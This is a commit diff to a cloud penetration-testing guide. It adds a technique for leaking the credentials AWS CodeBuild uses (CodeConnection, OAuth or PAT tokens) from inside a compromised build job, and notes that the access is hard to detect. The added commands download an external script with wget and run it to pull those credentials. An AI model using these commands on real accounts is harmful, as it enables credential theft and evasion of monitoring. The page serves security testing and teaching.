Merge pull request #273 from thomaspreece/master

Add new CodeBuild credential leakage technique

Author: carlospolop

src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md

@@ -10,6 +10,18 @@ First, check if there are any source credentials configured that you could leak:
 aws codebuild list-source-credentials
 ```
 
+### Via RCE in CodeBuild Job
+
+From within a CodeBuild job, you can hit an undocumented AWS CodeBuild API endpoint which will return you the credentials used by CodeBuild. This can be used to obtain the credentials the CodeBuild job was setup with e.g. AWS CodeConnection credentials, OAUTH or PAT credentials. The CodeBuild job does not need to be privileged to hit this endpoint and it is also hard to detect in logging and monitoring as CodeBuild itself calls this endpoint several times on startup. 
+
+The technique is explained further in [https://thomaspreece.com/2026/03/23/part-2-aws-codebuild-escalating-privileges-via-aws-codeconnections/](https://thomaspreece.com/2026/03/23/part-2-aws-codebuild-escalating-privileges-via-aws-codeconnections/) but in summary to obtain credentials within the CodeBuild job you just need to run the following:
+
+```
+python -m pip install botocore boto3 requests
+wget https://raw.githubusercontent.com/thomaspreece/AWS-CodeFactoryTokenService-API/refs/heads/main/GetBuildInfo.py
+python ./GetBuildInfo.py
+```
+
 ### Via Docker Image
 
 If you find that authentication to for example Github is set in the account, you can **exfiltrate** that **access** (**GH token or OAuth token**) by making Codebuild to **use an specific docker image** to run the build of the project.